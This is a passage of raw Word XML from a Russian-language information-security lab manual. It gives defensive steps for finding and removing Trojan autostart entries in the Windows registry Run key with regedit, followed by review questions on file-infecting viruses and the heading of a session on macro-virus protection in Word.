      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Если в указанном ключе содержатся дополнительные записи, то это м</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>гут быть «троянские программы».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="432"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="173" w:hanging="295"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В этом случае проанализируйте место расположения программы, обр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тите внимание на время создания файла и сопоставьте с Вашими действиями в это время.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="523"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="172" w:hanging="295"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Если время создания файла совпадает со временем Вашей работы в И</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тернете, то возможно, что в это время Ваш компьютер был заражен «троянским конем».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="523"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="172" w:hanging="295"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для удаления этой записи необходимо дважды щелк-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">нуть на названии ключа (или при выделенном ключе выбрать команду </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Изменить </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">из меню </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Правка </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">программы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>regedit.exe).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="172" w:hanging="295"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">открывшемся окне в поле </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Значение </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(рисунок 5) удалите ссылку на подозрительный файл.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5775960" cy="31927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75960" cy="3192780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="562"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="467" w:hanging="295"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Закройте программу </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>regedit.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="562"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="172" w:hanging="295"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Перейдите в папку с подозрительным файлом и удалите его.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="562"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="172" w:hanging="295"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Перезагрузите операционную систему и выполните пункты задания 1-4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="562"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="172" w:hanging="295"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Если содержимое рассматриваемого ключа не изменилось, то предп</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>лагаемый «троянский конь» удален из Вашей системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="562"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="008000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Еще одним потенциальным местом записей на запуск «троянских пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">грамм» является раздел автозапуска </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Run.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для его проверки выполните следующее.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Запустите программу </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>regedit.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="2A2A2A"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2. В открывшемся окне выберите ветвь </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2A2A2A"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">HKEY_LOCAL_MACHINE </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="2A2A2A"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и далее</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="2A2A2A"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2A2A2A"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Software\Microsoft\Windows\CurrentVersion\Run\... </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2A2A2A"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(REG_SZ) </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="2A2A2A"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(рис. 6).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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5463540" cy="25831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63540" cy="258318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p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="562"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В рассматриваемом примере автоматически запускается резидентный антивирус (nod32kui), а также утилита, относящаяся к программе контроля с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>стояния электропитания и заряда батареи (EPM-DM и ePowerManagement) .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="562"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="562"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Если в указанном разделе есть записи вызывающие подозрения, то выполните пункты 6-14 предыдущего задания.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="562"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="90"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Контрольные вопросы и задания </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>к занятию</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1191" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>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D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Как работает вирус, замещающий программный код?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Какие действия осуществляются для выпо</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>лнения хода лаборато</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>р</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ной работы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0003074F">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D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Какие изменения были внесены в файл?</w:t>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49"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Как и с помощью чего можно обнаружить программу вносящую изменение в исполняемые файлы?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="562"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="131" w:name="_Toc3811335"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Практическое занятие </w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Профилактика проникновения вредоносн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">го программного обеспечения посредством </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>организации защиты от макр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>вирусов средствами Microsoft Word</w:t>
      </w:r>
      <w:bookmarkEnd w:id="131"/>
    </w:p>
